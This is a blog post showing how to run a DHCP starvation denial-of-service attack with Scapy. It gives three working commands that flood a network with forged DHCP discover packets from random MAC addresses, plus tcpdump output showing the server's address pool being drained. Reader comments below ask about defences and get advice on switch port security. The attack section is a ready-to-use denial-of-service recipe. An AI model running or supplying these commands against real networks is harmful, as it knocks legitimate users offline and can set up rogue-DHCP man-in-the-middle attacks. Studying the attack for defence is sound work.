DHCP Denial of Service with scapy
1. Introduction
This is a small post explaining how to run a starvation attack against a DHCP server with only three lines of code (thanks to Scapy!).
Information & download regarding Scapy :
Information about DHCP Starvation attack :
2. Starvation attack with scapy
Running a starvation attack is nothing more than sending a lot of dummy DHCP requests, with random source MAC addresses. After few second, there is no more IP addresses available in the pool.
Warning: Don’t run this attack against networks you are not authorized !
[root@host1 ]$ scapy
Welcome to Scapy (v1.1.1 / -)
>>> conf.checkIPaddr = False
>>> dhcp_discover = Ether(src=RandMAC(),dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=RandString(12,'0123456789abcdef'))/DHCP(options=[("message-type","discover"),"end"])
>>> sendp(dhcp_discover,loop=1)
...............................................................^C
Sent 70 packets.
To stop the attack, simply press Ctrl+C.
Does it work ? Yes, take a look at the following tcpdump captures.
2.1. The DHCP queries:
[root@host2 ]$ tcpdump -n -e -i eth0 port 68
ec:51:e2:20:5b:93 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 64:38:62:38:63:65, length 244
8e:97:0f:18:8a:19 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 39:33:39:37:65:66, length 244
28:a7:45:35:c0:47 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 38:34:66:64:33:63, length 244
...
2.2. Then the DHCP responses:
00:23:20:56:53:f0 > 64:38:62:38:63:65, ethertype IPv4 (0x0800), length 347: 192.168.0.1.67 > 192.168.0.117.68: BOOTP/DHCP, Reply, length 305 00:23:20:56:53:f0 > 39:33:39:37:65:66, ethertype IPv4 (0x0800), length 347: 192.168.0.1.67 > 192.168.0.118.68: BOOTP/DHCP, Reply, length 305 00:23:20:56:53:f0 > 38:34:66:64:33:63, ethertype IPv4 (0x0800), length 347: 192.168.0.1.67 > 192.168.0.119.68: BOOTP/DHCP, Reply, length 305 ...
3. The End
Hope you enjoy.
(4 votes, average: 5.00 out of 5)
Loading...
© 2010 – 2014, foip. All rights reserved.
5 Comments
Comments are closed.
Hi my friend,
Thank you for this info. but how can i prevent this on my network?
Hi, it depend your environment. See here some examples http://hakipedia.com/index.php/DHCP_Starvation
Hello! You will need to enable port security. Setting may vary by distributor, but the main way I use to prevent this attack is to limit the number of MAC sources allowed from one port.
Another thing that’s good to do is enable a single port to trust the legitimate DHCP server. When someone runs this DOS attack, they will easily be able to set up a rogue DHCP server acting as the default gateway, and become man in the middle.
im just using a linux gateway serve as hotspot. can i prevent this using iptables? can you please tell me how to do it. im worried because i did your procedure and it consume all the ip and hang. i need to prevent this…
I’m afraid to have no idea. Such attack are usually prevented on the switch “ports”. The goal is to limit the number of clients (MAC addresses) behind a physical port. Maybe Google know the solution for your environment ..
Good luck.